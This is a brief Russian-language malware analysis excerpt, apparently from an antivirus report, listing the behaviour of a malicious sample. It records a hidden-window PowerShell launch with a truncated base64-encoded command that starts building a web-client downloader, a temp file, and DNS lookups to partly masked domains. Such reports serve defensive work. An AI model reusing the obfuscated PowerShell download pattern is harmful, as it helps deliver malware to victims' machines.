Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABtAEcAWgBBAEEAWgA0AFEAPQAoACcAegBHAFEAWABBACcAKwAnAEEAJwArACcAQQBEACcAKQA7ACQAegA0AGsAQQBEAEEAMQBBAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1512
- %TEMP%\804918.cvr
- DNS ASK pl#######nslidingdoorrepair.net
- DNS ASK ge###########abetes.eastus.cloudapp.azure.com
- DNS ASK ur######vokat-mogilev.by
- DNS ASK ar##sms.ir
- DNS ASK do###eninja.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABtAEcAWgBBAEEAWgA0AFEAPQAoACcAegBHAFEAWABBACcAKwAnAEEAJwArACcAQQBEACcAKQA7ACQAegA0AGsAQQBEAEEAMQBBAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAG...' (со скрытым окном)